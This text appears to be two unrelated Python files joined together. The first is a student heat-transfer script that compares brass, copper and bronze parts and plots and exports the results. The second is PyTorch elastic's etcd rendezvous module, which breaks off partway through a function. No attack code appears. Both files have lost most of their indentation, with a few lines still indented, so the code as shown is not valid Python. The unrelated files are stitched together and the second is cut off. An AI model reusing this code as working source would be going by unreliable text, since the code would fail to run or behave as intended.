#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# PURPOSE OF THIS MODULE :
# Main input script to execute the heat transfer
# project.
#
# REQUIREMENTS : (Linux/Mac/Windows) Python 3.x
#
# Developer: Sterling Reynolds , Undergraduate student
# Contact: icu327@my.utsa.edu
# Department of Mechanical Engineering, UTSA Texas
#
# License: MIT
# If you're using this for academic work, a donation of coffee to the
# developer would be much appreciated.
# DATE: March 2020 (SR)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import numpy as np
import matplotlib.pyplot as plt
from matplotlib import cm  # colormaps (cm.terrain, cm.jet, cm.brg) used below
from multiprocessing import Process
import pandas as pd
from Project_HT.analysis_class import *
from Project_HT.input import *
def main():
#***************************************************************************
# Insulated
# _ _ _ _ _ _ _
# | | | | | | | | | | | | / ______ Vf = 10 (m/s)
# | | | | | | | | | | | | \
# Lp | | | | | | | | | | | | / ______ Tf_inf = 20 (C)
# | | | | | | | | | | | | \
# | | | | | | | | | | | |
# - *-------------------------------------*
# |/////////////////////////////////////| R_pp = 10^-4 (m^2K / W)
# - *-------------------------------------*
# | |
# 0.005m | |
# | |
# - *-------------------------------------*
# / ______ Vb = 10 (m/s)
# \
# / ______ Tb_inf = 20 (C)
# \
# 12.7mm
# |~~~~~~~~~~~~~~~~~ W ~~~~~~~~~~~~~~~~~|
#***************************************************************************
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Start: Retrieve properties from input file
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
init_prop = init_properties()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Start: Retrieve properties from input file
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Brass ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    thermal_conductivity = 64 # W/(m*K)
    density = 8400 # (kg/m^3)
Brass_analysis= analysis(init_prop,thermal_conductivity,density)
# Brass ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copper ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    thermal_conductivity = 413 # W/(m*K)
    density = 8940 # (kg/m^3)
CU_analysis= analysis(init_prop,thermal_conductivity,density)
# Copper ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Bronze ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    thermal_conductivity = 15 # W/(m*K)
    density = 7700 # (kg/m^3)
Bronze_analysis= analysis(init_prop,thermal_conductivity,density)
# Bronze ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Start analysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    # NOTE: the original code passed target=<analysis>.main(), which calls main()
    # immediately in the parent process and hands its return value (None) to
    # Process, so the spawned processes did no work. Since the results are read
    # back from the analysis objects below, the analyses are simply run in-process
    # here; true parallelism would require sending the results back, e.g. via a Queue.
    Brass_analysis.main()
    CU_analysis.main()
    Bronze_analysis.main()
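    # A hypothetical sketch of how the three analyses could be parallelised while
    # still collecting results in the parent (assumes the analysis objects and
    # their results are picklable):
    #
    #     from multiprocessing import Queue
    #     def worker(an, q):
    #         an.main()
    #         q.put((an.results, an.last_res))
    #     q = Queue()
    #     procs = [Process(target=worker, args=(an, q))
    #              for an in (Brass_analysis, CU_analysis, Bronze_analysis)]
    #     for p in procs: p.start()
    #     gathered = [q.get() for _ in procs]   # collect before join to avoid blocking
    #     for p in procs: p.join()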
# End of analysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Get data from objects
results_Brass = np.concatenate(Brass_analysis.results )
results_CU = np.concatenate(CU_analysis.results )
results_Bronze = np.concatenate(Bronze_analysis.results)
fig = plt.figure(1)
ax1 = fig.add_subplot(111, projection='3d')
#surf = ax1.plot_trisurf(results_Brass[:,1], results_Brass[:,2], results_Brass[:,0], cmap=cm.terrain, linewidth=0, alpha=0.55 )
#surf11 = ax1.plot_trisurf(results_CU[:,1], results_CU[:,2], results_CU[:,0], cmap=cm.jet, linewidth=0, alpha=.55 )
#surf1 = ax1.plot_trisurf(results_Bronze[:,1], results_Bronze[:,2], results_Bronze[:,0], cmap=cm.brg, linewidth=0, alpha=0.55)
#cbar = fig.colorbar(surf11)
#cbar.set_label('Qc (W)',labelpad=30, rotation=270)
surf = ax1.plot_trisurf(results_Brass[:,1], results_Brass[:,2] , results_Brass[:,3] * 10**3, cmap=cm.terrain, linewidth=0, alpha=1 )
surf11 = ax1.plot_trisurf(results_CU[:,1], results_CU[:,2] , results_CU[:,3] * 10**3, cmap=cm.jet, linewidth=0, alpha=.55 )
surf1 = ax1.plot_trisurf(results_Bronze[:,1], results_Bronze[:,2], results_Bronze[:,3] * 10**3, cmap=cm.brg, linewidth=0, alpha=0.55)
cbar = fig.colorbar(surf11)
cbar.set_label('Mass (Grams)',labelpad=30, rotation=270)
plt.xlabel('Lp (mm)')
plt.ylabel('Dp (mm)')
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
two_d_results_Brass = np.concatenate( Brass_analysis.last_res )
two_d_results_CU = np.concatenate( CU_analysis.last_res )
two_d_results_Bronze = np.concatenate(Bronze_analysis.last_res )
fig1 = plt.figure(3)
plt.plot(two_d_results_Brass[:,2], two_d_results_Brass[:,0] ,label='Brass' )
plt.plot(two_d_results_CU[:,2], two_d_results_CU[:,0] ,label='Copper')
plt.plot(two_d_results_Bronze[:,2], two_d_results_Bronze[:,0],label='Bronze')
plt.legend()
plt.xlabel('Lp (mm)')
plt.ylabel('Qc (W)')
title = 'Maximum diameter for N = ' + str(init_prop[0])
plt.title(title)
plt.show()
df_results_Brass = pd.DataFrame(results_Brass )
df_results_CU = pd.DataFrame(results_CU )
df_results_Bronze = pd.DataFrame(results_Bronze)
df_results_Brass.to_excel('Excel/Brass.xlsx')
df_results_CU.to_excel('Excel/Copper.xlsx')
df_results_Bronze.to_excel('Excel/Bronze.xlsx')
if __name__ == "__main__":
main()
|
etcd_rendezvous.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import json
import logging
import sys
import threading
import time
from typing import Optional
import etcd # type: ignore[import]
from torch.distributed.elastic.rendezvous import (
RendezvousClosedError,
RendezvousError,
RendezvousHandler,
RendezvousParameters,
RendezvousTimeoutError,
)
from .utils import parse_rendezvous_endpoint
from .etcd_store import EtcdStore, cas_delay
_log_fmt = logging.Formatter("%(levelname)s %(asctime)s %(message)s")
_log_handler = logging.StreamHandler(sys.stderr)
_log_handler.setFormatter(_log_fmt)
log = logging.getLogger(__name__)
log.propagate = False
log.setLevel(logging.INFO)
log.addHandler(_log_handler)
# Retryable failure exception means that we were too late to make
# a desired state transition (e.g. because of a race condition),
# and should now restart from the beginning.
# A small delay is recommended to avoid spamming Etcd.
class EtcdRendezvousRetryableFailure(Exception):
pass
# Similar to retryable failure, but the new state we observed suggests we
# can re-try immediately, i.e. without a need for "safety delay".
class EtcdRendezvousRetryImmediately(Exception):
pass
# Default timeout for the rendezvous.
_DEFAULT_TIMEOUT: int = 600 # 10 minutes
# Additional waiting time after reaching the minimum number of nodes
# in case the rendezvous is elastic (min != max).
_DEFAULT_LAST_CALL_TIMEOUT: int = 30 # 30 seconds
# Various constants used internally in EtcdRendezvous
CONST_ETCD_SETUP_TTL = 5
CONST_ETCD_FROZEN_TTL = 10
CONST_ETCD_JOINABLE_EPHEMERAL_TTL = 10
# Ephemeral node TTL for worker's keep-alive key:
CONST_WORKER_KEEPALIVE_TTL = 10
# TTL for the ephemeral run_id-specific directory. All rendezvous state data
# for a specific run_id (job instance) is contained within this directory.
# Its only role is to clean up rendezvous data from old runs (for the case when
# the etcd server is persistent), and it has no effect on correctness, but should be
# larger than any timeouts that a worker process is expected to survive:
CONST_RUNID_SUBROOT_TTL = 7200 # 2 hours
class EtcdRendezvousHandler(RendezvousHandler):
"""
Implements a :py:class:`torchelastic.rendezvous.RendezvousHandler`
interface backed by
:py:class:`torchelastic.rendezvous.etcd_rendezvous.EtcdRendezvous`.
Torchelastic uses a URL to configure the type of rendezvous to use and
to pass implementation specific configurations to the rendezvous module.
The basic etcd rendezvous configuration URL looks like the following
::
etcd://<etcd_address>:<port>/<job_id>?min_workers=<min_workers>&max_workers=<max_workers> # noqa: W605
-- example --
etcd://localhost:2379/1234?min_workers=1&max_workers=3
The URL above is interpreted as follows:
1. Use the rendezvous handler that is registered with the ``etcd``
scheme
2. The ``etcd`` endpoint to use is ``localhost:2379``
3. ``job_id == 1234`` is used as the prefix in etcd (this allows one to
share a common etcd server for multiple jobs so long as the
``job_ids`` are guaranteed to be unique). Note that the job id can be
any string (e.g. does not need to be a number) as long as it is
unique.
4. ``min_workers=1`` and ``max_workers=3`` specifies a range for
membership size - torchelastic starts running the job as long as the
cluster size is greater than or equal to ``min_workers`` and admits
up to ``max_workers`` into the cluster.
Below are a full list of the parameters that can be passed to etcd
rendezvous:
+--------------------------------------------+--------------------------+
| Parameter | Description |
+============================================+==========================+
| min_workers | minimum number of |
| | workers for the |
| | rendezvous to be valid |
+--------------------------------------------+--------------------------+
| max_workers | maximum number of |
| | workers to admit |
+--------------------------------------------+--------------------------+
| timeout | total timeout within |
| | which next_rendezvous is |
| | expected to succeed |
| | (default 600s) |
+--------------------------------------------+--------------------------+
| last_call_timeout | additional wait amount |
| | (“last call”) after min |
| | number of workers has |
| | been reached (defaults |
| | to 30s) |
+--------------------------------------------+--------------------------+
| etcd_prefix | path prefix (from etcd |
| | root), inside which all |
| | etcd nodes will be |
| | created (defaults to |
| | ``/torchelastic/p2p``) |
+--------------------------------------------+--------------------------+
"""
def __init__(self, rdzv_impl):
self._rdzv_impl = rdzv_impl
def __del__(self):
# TODO: look into using weakref here instead.
del self._rdzv_impl
def get_backend(self) -> str:
return "etcd"
def next_rendezvous(self):
rdzv_version, rank, world_size = self._rdzv_impl.rendezvous_barrier()
log.info("Creating EtcdStore as the c10d::Store implementation")
store = self._rdzv_impl.setup_kv_store(rdzv_version)
return store, rank, world_size
def is_closed(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
return state["status"] == "closed"
except etcd.EtcdKeyNotFound:
# No rendezvous state, so it cannot be closed.
return False
def set_closed(self):
self._rdzv_impl.set_closed()
def num_nodes_waiting(self):
try:
_, state = self._rdzv_impl.get_rdzv_state()
if state["status"] == "final":
return state["num_workers_waiting"]
except etcd.EtcdKeyNotFound:
pass
return 0
def get_run_id(self) -> str:
return self._rdzv_impl._run_id
def shutdown(self) -> bool:
try:
self.set_closed()
return True
except BaseException as e:
log.warning(f"Shutdown failed. Error occurred: {str(e)}")
return False
# TODO: we should probably handle a few additional errors,
# like EtcdLeaderElectionInProgress and EtcdWatcherCleared. These are
# only relevant for multi-node Etcd ensemble. A simple retry would work,
# but is verbose to add everywhere. Consider wrapping the client calls
# into auto-retry for these errors?
#
class EtcdRendezvous(object):
"""
A rendezvous implementation that uses `etcd <https://etcd.io/>`__ as
the backend store.
"""
def __init__(
self,
client,
prefix,
run_id,
num_min_workers,
num_max_workers,
timeout,
last_call_timeout,
):
self.client = client
log.info("Etcd machines: " + str(self.client.machines))
self._prefix = prefix
self._run_id = run_id
self._num_min_workers = num_min_workers
self._num_max_workers = num_max_workers
self._timeout = timeout
self._last_call_timeout = last_call_timeout
# For cleaning up TTL refresher threads (for ephemeral keys)
self._lease_run_id_stop = None
self._lease_this_rank_stop = None
if not self._prefix.endswith("/"):
self._prefix += "/"
# Setup a permanent prefix dir, if didn't exist
if self._prefix != "/":
self.create_path_if_not_exists(self._prefix)
# Lease a "sub-root" node specific to this job instance (run_id)
self.create_path_if_not_exists(self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL)
self._lease_run_id_stop = self.setup_lease_renewal(
self.get_path(""), ttl=CONST_RUNID_SUBROOT_TTL
)
# Subdir for all rendezvous work
self.create_path_if_not_exists(self.get_path("/rdzv"))
# Create a rendezvous version counter, if doesn't exist
try:
self.client.write(
key=self.get_path("/rdzv/version_counter"), value="0", prevExist=False
)
except etcd.EtcdAlreadyExist:
pass
def __del__(self):
# TODO: look into using weakref here instead.
if self._lease_run_id_stop is not None:
self._lease_run_id_stop.set()
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
def rendezvous_barrier(self):
"""
Main entry point for next rendezvous.
This method is blocking until rendezvous succeeds or a timeout occurs.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousTimeoutError - timeout waiting for rendezvous
RendezvousClosedError - rendezvous is or was closed while waiting
RendezvousError - other persistent errors that
render the rendezvous non-retryable
"""
self._rendezvous_deadline = time.time() + self._timeout
while True:
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutError()
log.info("Attempting to join next rendezvous")
try:
# Dis-own our lease in the previous rendezvous, if exists
if self._lease_this_rank_stop is not None:
self._lease_this_rank_stop.set()
return self.init_phase()
except EtcdRendezvousRetryImmediately:
# The type of failure suggests we can retry without delay
pass
except EtcdRendezvousRetryableFailure:
# In case of retryable failure, wait a small delay
# to avoid spamming etcd
time.sleep(1)
except RendezvousTimeoutError:
log.info("Rendezvous timeout occured in EtcdRendezvousHandler")
raise
except RendezvousClosedError:
log.info(
f"Rendezvous for run_id={self._run_id} was observed to be closed"
)
raise
except RendezvousError:
raise
except Exception as e:
# In case of a general exception, wait a small delay
# to avoid spamming etcd
# FIXME: there are a few things that fall under this like
# etcd.EtcdKeyNotFound, etc, which could be handled more explicitly.
log.info("Rendezvous attempt failed, will retry. Reason: " + str(e))
time.sleep(1)
def init_phase(self):
"""
Initially, the rendezvous state is expected to be one of:
1. empty (non-existent) - in this case we try to create a new one.
2. joinable - we try to join it.
3. final - we announce ourselves as waiting, and go into monitoring mode
Any other state is considered transitional, and will be retried after
a short delay.
Returns:
``(rdzv_version, rank, world_size)``
Raises:
RendezvousClosedError - current rendezvous was/is closed
EtcdRendezvousRetryableFailure - observed some intermediate
state, which is best handled by retrying later
"""
try:
active_version = self.try_create_rendezvous()
state = json.loads(active_version.value)
log.info("New rendezvous state created: " + str(state))
except etcd.EtcdAlreadyExist:
active_version, state = self.get_rdzv_state()
# Note: it is possible for above query to fail (etcd.EtcdKeyNotFound),
# but this is ok for us - just means we'll restart from beginning.
log.info("Observed existing rendezvous state: " + str(state))
if state["status"] == "closed":
raise RendezvousClosedError()
if state["status"] == "joinable":
return self.join_phase(state["version"])
if state["status"] == "final":
self.handle_existing_rendezvous(state["version"])
raise EtcdRendezvousRetryImmediately()
self.try_wait_for_state_change(etcd_index=active_version.etcd_index + 1)
raise EtcdRendezvousRetryableFailure()
def join_phase(self, expected_version):
"""
We observed a rendezvous state in 'joinable' state, and attempt to join this
particular version, and then wait for all other peers to join.
"""
# Failure to join will propagate an exception, causing a re-entry.
active_version, this_rank = self.join_rendezvous(expected_version)
state = json.loads(active_version.value)
log.info(
"Joined rendezvous version {} as rank {}. Full state: {}".format(
state["version"], this_rank, state
)
)
# If this worker was first to reach num_min_workers requirement,
# and rendezvous is still joinable (therefore it is elastic),
        # then this worker will be responsible for waiting out the "last call"
# timeout and closing (i.e. transitioning to 'frozen') the rendezvous
# afterwards.
# As a safety against a potential failure of this worker (during the
# last call timeout), the rendezvous state is made ephemeral
# when min_num_workers is reached.
if this_rank == self._num_min_workers - 1 and state["status"] == "joinable":
log.info("Rank {} is responsible for join last call.".format(this_rank))
last_call_deadline = time.time() + self._last_call_timeout
self.handle_join_last_call(expected_version, last_call_deadline)
log.info("Rank {} finished join last call.".format(this_rank))
# Wait for rendezvous state to be frozen, which means a fixed set of peers
log.info("Waiting for remaining peers.")
active_version = self.wait_for_peers(expected_version)
state = json.loads(active_version.value)
assert (
state["version"] == expected_version
), "Logic error: failed to observe version mismatch"
return self.confirm_phase(expected_version, this_rank)
def confirm_phase(self, expected_version, this_rank):
"""
        Once the rendezvous state transitions from 'joinable' to 'frozen',
we have every participant confirm their membership and setup per-member
keep-alive TTL keys, and then wait for all other participants to confirm,
which would then successfully conclude this rendezvous.
"""
log.info("All peers arrived. Confirming membership.")
self.confirm_membership(expected_version, this_rank)
log.info("Waiting for confirmations from all peers.")
active_version = self.wait_for_final(expected_version)
state = json.loads(active_version.value)
log.info(
"Rendezvous version {} is complete. Final state: {}".format(
state["version"], state
)
)
# Rendezvous version number; our rank in it; world size
return state["version"], this_rank, len(state["participants"])
def handle_existing_rendezvous(self, expected_version):
"""
        Handle the case when there's an existing (state 'final') rendezvous already
in place, and we have to announce ourselves waiting, and wait until
the next rendezvous opportunity.
"""
# If state is 'final' -> increment num_workers_waiting
# Then, observe state changes:
# 1. if it's no longer final -> bail out and re-try
# 2. if keep alives are missing, destroy it and bail out.
active_state = self.announce_self_waiting(expected_version)
log.info(
"Added self to waiting list. Rendezvous full state: {}".format(
active_state.value
)
)
self.wait_for_rendezvous_to_free(expected_version)
log.info("Previously existing rendezvous state changed. Will re-try joining.")
def try_create_rendezvous(self):
"""
Create new rendezvous state or raise an exception that indicates
an unexpected state (e.g. already exists)
Raises:
RendezvousError - on unexpected state
"""
# Initially active_version is ephemeral - this is to handle the
        # possibility that we might fail to complete the setup transaction,
# i.e. the transition "setup" -> "joinable".
active_version = self.client.write(
key=self.get_path("/rdzv/active_version"),
value=json.dumps({"status": "setup"}),
prevExist=False,
ttl=CONST_ETCD_SETUP_TTL,
)
try:
version_counter = self.client.get(self.get_path("/rdzv/version_counter"))
version_counter.value = str(int(version_counter.value) + 1)
self.client.update(version_counter)
except (etcd.EtcdKeyNotFound, etcd.EtcdCompareFailed):
raise RendezvousError(
"Unexpected state of EtcdRendezvousHandler, worker needs to die."
)
# Any failure below results in declaring a retryable rendezvous failure.
# The ephemeral /rdzv/active_version will expire and someone can then
# re-try the setup process.
# Create directory node for participant data
self.client.write(
key=self.get_path("/rdzv/v_{}".format(version_counter.value)),
value=None,
dir=True,
prevExist=False,
)
# Publish rendezvous version and signal it is ready-to-be-joined.
# If rendezvous was set closed just before this, a retry will happen,
# where the closed condition will be handled.
return self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(
{
"status": "joinable",
"version": version_counter.value,
"participants": [],
}
),
prev_value=active_version.value,
)
def join_rendezvous(self, expected_version):
"""
Helper method for the join phase.
"""
# Use compare-and-swap to add self to rendezvous state:
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "joinable":
raise EtcdRendezvousRetryableFailure(
"Rendezvous state became non-joinable before we could join. "
"Must join next one."
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
assert (
len(state["participants"]) < self._num_max_workers
), "Logic error: joinable rendezvous should always have space left"
this_rank = len(state["participants"])
state["participants"].append(this_rank)
# When reaching min workers, or changing state to frozen, we'll set
# the active_version node to be ephemeral.
set_ttl: Optional[int] = None
if len(state["participants"]) == self._num_max_workers:
state["status"] = "frozen"
state["keep_alives"] = []
set_ttl = CONST_ETCD_FROZEN_TTL
elif len(state["participants"]) >= self._num_min_workers:
set_ttl = CONST_ETCD_JOINABLE_EPHEMERAL_TTL
try:
# Compare-and-swap.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=set_ttl,
)
# We succeeded joining.
return active_version, this_rank
except etcd.EtcdCompareFailed:
log.info("Join rendezvous CAS unsuccessful, retrying")
def wait_for_peers(self, expected_version):
"""
Helper method for the join phase.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Success, all peers arrived.
return active_version
elif state["status"] == "joinable" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def confirm_membership(self, expected_version, this_rank):
"""
Helper method for the confirm phase
"""
# Compare-and-swap loop
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "frozen":
raise EtcdRendezvousRetryImmediately(
"Rendezvous no longer frozen, before we confirmed. "
"Must join next one"
)
if state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately(
"Rendezvous version changed. Must try join the new one."
)
this_lease_key = self.get_path(
"/rdzv/v_{}/rank_{}".format(expected_version, this_rank)
)
self.client.set(this_lease_key, value=None, ttl=CONST_WORKER_KEEPALIVE_TTL)
state["keep_alives"].append(this_lease_key)
if len(state["keep_alives"]) == len(state["participants"]):
# Everyone confirmed (this rank is last to do so)
state["status"] = "final"
state["num_workers_waiting"] = 0
finalize = True
else:
finalize = False
try:
# Compare-and-swap. If new state is still frozen, keep it ephemeral.
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=None if finalize else CONST_ETCD_FROZEN_TTL,
)
self._lease_this_rank_stop = self.setup_lease_renewal(
this_lease_key, ttl=CONST_WORKER_KEEPALIVE_TTL
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Confirm membership CAS unsuccessful, retrying")
def wait_for_final(self, expected_version):
"""
Helper method for the confirm phase
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "final" and state["version"] == expected_version:
                # Success. This rendezvous is final, and we accept it.
return active_version
elif state["status"] == "frozen" and state["version"] == expected_version:
# Continue waiting for any interesting events.
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1
)
else:
# No valid transition possible at this point
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
def announce_self_waiting(self, expected_version):
"""
Announce this worker is waiting (via num_workers_waiting counter) to join next
rendezvous, but only if state and version match.
"""
while True:
cas_delay()
active_version, state = self.get_rdzv_state()
if state["status"] != "final" or state["version"] != expected_version:
raise EtcdRendezvousRetryImmediately()
# Increment counter to signal an additional waiting worker.
state["num_workers_waiting"] += 1
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return active_version
except etcd.EtcdCompareFailed:
log.info("Announce self as waiting CAS unsuccessful, retrying")
def wait_for_rendezvous_to_free(self, expected_version):
"""
When there's an existing valid rendezvous in state 'final', we have to
wait until the next opportunity to join.
Such opportunity may come from:
1. rendezvous state changed by someone else, in which case we unblock and retry.
2. rendezvous becomes invalid because at least one member failed to renew their
leased keep_alive node. We detect this, and destroy the rendezvous.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] != "final" or state["version"] != expected_version:
return
# Check if current rendezvous state is valid, in the sense that all
# its members are alive (renewing their lease).
# If not, try destroy this rendezvous, so a new one can be created.
alive_members = self.client.get(
self.get_path("/rdzv/v_{version}".format(version=expected_version))
)
keep_alive_keys = [ch.key for ch in alive_members.children]
for key in state["keep_alives"]:
if key not in keep_alive_keys:
# This participant didn't renew their lease. We'll declare this
# rendezvous version as dead (but only if it hadn't changed)
log.info("Keep-alive key {} is not renewed.".format(key))
log.info(
"Rendevous version {} is incomplete. ".format(expected_version)
)
log.info("Attempting to destroy it.")
# Compare-and-delete operation. Throws if compare failed,
# which means rendezvous was already destroyed/re-created/closed,
# and we can try to re-enter the barrier.
self.client.delete(
key=self.get_path("/rdzv/active_version"),
prevValue=active_version.value,
)
log.info(
"Destroyed rendezvous version {} successfully.".format(
expected_version
)
)
# We can return (and retry) immediately
return
# Existing rendezvous seems valid, no reason to destroy it.
# We just have to wait until something changes and re-check.
try:
overall_timeout = (
max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
)
self.client.watch(
key=self.get_path("/rdzv"),
index=active_version.etcd_index + 1,
recursive=True,
timeout=overall_timeout,
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutError()
active_version, state = self.get_rdzv_state()
def handle_join_last_call(self, expected_version, deadline):
"""
After we reach min number of workers, one particular worker takes on the
responsibility of waiting an additional timeout before closing the join window.
If the worker responsible for this fails, the rendezvous will be destroyed due
to expiring TTL, and the other participants will re-rendezvous.
Here we expect to see state <joinable, expected_version>
Exit gracefully if either:
1. state becomes <frozen, expected_version>
2. timeout happens (reaching deadline), in which case
           we try the transition to <frozen, expected_version>
Exit with exception otherwise.
"""
active_version, state = self.get_rdzv_state()
while True:
if state["status"] == "frozen" and state["version"] == expected_version:
# Worker set became frozen before last-call timeout. This is possible
                # when num_max_workers is reached before the timeout.
return
if state["status"] != "joinable" or state["version"] != expected_version:
raise EtcdRendezvousRetryableFailure(
"Rendezvous state transition no longer possible. Must re-enter."
)
# If timeout occurred, attempt a state transition (joinable -> frozen)
if time.time() >= deadline:
state["status"] = "frozen"
state["keep_alives"] = []
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
ttl=CONST_ETCD_FROZEN_TTL,
)
# We successfully made this rendezvous frozen.
return
except etcd.EtcdCompareFailed:
log.info("Join last-call transition CAS unsuccessful. Will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
continue
# Timeout did not occur, so we must refresh TTL, and wait for
# further changes. Note: we only want TTL to be refreshed if
# state is still joinable, hence we use CAS for that here,
# even though we don't change any of the data.
try:
active_version = self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=active_version.value,
prev_value=active_version.value,
ttl=CONST_ETCD_JOINABLE_EPHEMERAL_TTL,
)
# Minimize "oversleeping":
timeout = min(
CONST_ETCD_JOINABLE_EPHEMERAL_TTL / 2,
deadline - time.time() + 1.0, # Oversleeping by 1s is ok.
)
active_version, state = self.try_wait_for_state_change(
etcd_index=active_version.etcd_index + 1, timeout=timeout
)
except etcd.EtcdCompareFailed:
log.info("Join last-call TTL refresh CAS unsuccessful, will retry")
cas_delay()
active_version, state = self.get_rdzv_state()
def set_closed(self):
"""
Mark rendezvous 'closed' for current run_id, which is used to signal other
participants to not attempt to perform (re-)rendezvous. This is useful
when one of the workers decides the job is complete.
"""
while True:
active_version, state = self.get_rdzv_state()
if state["status"] == "closed":
# Already closed by someone else.
return
state["status"] = "closed"
try:
self.client.test_and_set(
key=self.get_path("/rdzv/active_version"),
value=json.dumps(state),
prev_value=active_version.value,
)
return
except etcd.EtcdCompareFailed:
log.info("Set closed CAS unsuccessful, retrying")
cas_delay()
def get_rdzv_state(self):
active_version = self.client.get(key=self.get_path("/rdzv/active_version"))
return active_version, json.loads(active_version.value)
def try_wait_for_state_change(self, etcd_index, timeout=None):
# Don't sleep past the overall deadline (at least more than by 1s)
overall_timeout = max(self._rendezvous_deadline - time.time(), 0.0) + 1.0
timeout = overall_timeout if timeout is None else min(timeout, overall_timeout)
try:
self.client.watch(
self.get_path("/rdzv/active_version"), index=etcd_index, timeout=timeout
)
except (etcd.EtcdEventIndexCleared, etcd.EtcdWatchTimedOut):
pass
if time.time() > self._rendezvous_deadline:
raise RendezvousTimeoutError()
# Unfortunately, we have to do another fetch in order to get last etcd_index.
return self.get_rdzv_state()
def get_path(self, path):
if not path.startswith("/"):
path = "/" + path
return "{prefix}run_{run_id}{path}".format(
prefix=self._prefix, run_id=self._run_id, path=path
)
def create_path_if_not_exists(self, full_path, ttl=None):
try:
self.client.write(
key=full_path, value=None, dir=True, prevExist=False, ttl=ttl
)
except etcd.EtcdAlreadyExist:
pass
def setup_lease_renewal(self, full_path, ttl):
# NOTE: For ephemeral key TTL renewal (~lease) to work correctly,
# make sure you don't call any long-blocking methods that do not
# release the Python's GIL! An example of this is calling a pybind11
# extension function that is blocking / long-running, but is not
# doing a scoped release of the GIL.
def lease_worker(client, path, ttl, stop_event):
while True:
try:
client.refresh(path, ttl=ttl)
except etcd.EtcdKeyNotFound:
break
except ConnectionRefusedError:
# This error usually occurs during test when the server already got terminated but the
                    # Python garbage collector has not yet invoked the __del__ method.
break
if stop_event.wait(timeout=ttl / 2):
break
lease_stop_event = threading.Event()
lease_thread = threading.Thread(
target=lease_worker, args=(self.client, full_path, ttl, lease_stop_event)
)
lease_thread.daemon = True
lease_thread.start()
return lease_stop_event
def store_extra_data(self, rdzv_version, key, value):
node = self.get_path("/rdzv/v_{}/extra_data".format(rdzv_version))
try:
# If first time we are storing anything:
extra_data = self.client.write(
key=node, value=json.dumps({key: value}), prevExist=False
)
return
except etcd.EtcdAlreadyExist:
pass
# CAS loop, to make sure we don't lose concurrent stores.
while True:
# We never delete extra_data. Failure here should be fatal, no special handling.
extra_data = self.client.get(node)
new_extra_data_value = json.loads(extra_data.value)
new_extra_data_value[key] = value
try:
extra_data = self.client.test_and_set(
key=node,
value=json.dumps(new_extra_data_value),
